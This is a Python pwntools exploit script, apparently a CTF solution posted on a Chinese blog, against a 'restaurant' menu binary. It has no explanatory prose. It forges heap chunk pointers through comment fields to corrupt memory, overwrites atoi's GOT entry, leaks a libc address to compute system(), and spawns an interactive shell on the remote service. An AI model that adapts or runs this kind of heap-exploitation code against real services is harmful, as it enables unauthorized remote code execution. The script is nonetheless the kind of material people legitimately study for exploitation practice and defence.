





  1 from pwn import *
  2 import time
  3 #by wangaohui
  4 #context.log_level = 'debug'
  6 s= remote('',10001)
  7 time.sleep(2)
  8 print 'pid of restaurant is :' + str(pwnlib.util.proc.pidof('restaurant')[0])
  9 raw_input('go!')
 10 s.recvuntil('Please enter your name: ')
 11 s.sendline('/bin/sh;')
 12 s.recvuntil('you are the luckey ')
 13 heap = int(s.recvuntil('th guest.\n')[:-10])
 14 print 'heapaddr is %x' %heap
 15 s.recvuntil('Are you from China? (y/n) ')
 16 s.sendline('n')
 17 s.recvuntil('please enter your country: ');
 18 vtp = 0x404710
 19 data = 'a'*10 + '\x00' + 'a'*5 + '\x1c\x47\x40\x00'
 20 s.sendline(data)
 21 s.recvuntil('How old are you: ')
 22 s.sendline('10')
 24 s.recvuntil('8. Finish your order.')
 25 s.sendline('1')
 26 s.recvuntil('Successfully order a staple food, enjoy it!')
 28 s.recvuntil('8. Finish your order.')
 29 s.sendline('2')
 30 s.recvuntil('Successfully order an entree, enjoy it!')
 31 '''
 32 s.recvuntil('8. Finish your order.')
 33 s.sendline('3')
 34 s.recvuntil('Successfully order a staple food, enjoy it!')
 35 '''
 37 s.recvuntil('8. Finish your order.')
 38 s.sendline('7')
 39 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')
 40 s.sendline('1')
 41 s.recvuntil('How does this dish look: ')
 42 s.sendline('xxx')
 43 s.recvuntil('How does this dish taste: ')
 44 s.sendline('yyy')
 46 fakefd = heap + 0x20
 47 fakebk = heap + 0x28
 48 appcom = 'a'*40 + p64(0x80) + p64(0x90)
 49 tastecom = p64(0x81) + p64(fakefd) + p64(fakebk)
 50 s.recvuntil('8. Finish your order.')
 51 s.sendline('7')
 52 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')
 53 s.sendline('1')
 54 s.recvuntil('How does this dish look: ')
 55 s.sendline(appcom)
 56 s.recvuntil('How does this dish taste: ')
 57 s.sendline(tastecom)
 59 s.recvuntil('8. Finish your order.')
 60 s.sendline('5')
 61 s.recvuntil('want to cancel(1,2 or 3 depend on menu): ')
 62 s.sendline('2')
 63 s.recvuntil('the chef has already started to cook.')
 65 appcom = 'xxx'
 66 tastecom = p64(0x6060A0)#atoi's got
 67 s.recvuntil('8. Finish your order.')
 68 s.sendline('7')
 69 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')
 70 s.sendline('1')
 71 s.recvuntil('How does this dish look: ')
 72 s.sendline(appcom)
 73 s.recvuntil('How does this dish taste: ')
 74 s.sendline(tastecom)
 76 s.recvuntil('8. Finish your order.')
 77 s.sendline('6')
 78 s.recvuntil('Your age: ')
 79 atoiaddr = int(s.recvuntil('\n')[:-1])
 80 print 'atoiaddr is:  %x' % atoiaddr
 81 systemaddr = atoiaddr - 0x36360 + 0x414F0
 82 print 'systemaddr is:  %x' % systemaddr
 84 appcom = 'xxx'
 85 tastecom = 'a'*8 + p64(systemaddr)
 86 s.recvuntil('8. Finish your order.')
 87 s.sendline('7')
 88 s.recvuntil('make a comment(1,2 or 3 depend on menu): ')
 89 s.sendline('1')
 90 s.recvuntil('How does this dish look: ')
 91 s.sendline(appcom)
 92 s.recvuntil('How does this dish taste: ')
 93 s.sendline(tastecom)
 95 s.recvuntil('8. Finish your order.')
 96 s.sendline('8')
 98 s.recvuntil('3.Just so so!')
 99 s.sendline('3.Just so so!')
100 s.recvuntil('Thank you for your comment,bye!')
101 s.interactive()


posted @ 2016-02-24 00:46  简单地快乐  阅读(1410)  评论(3编辑  收藏  举报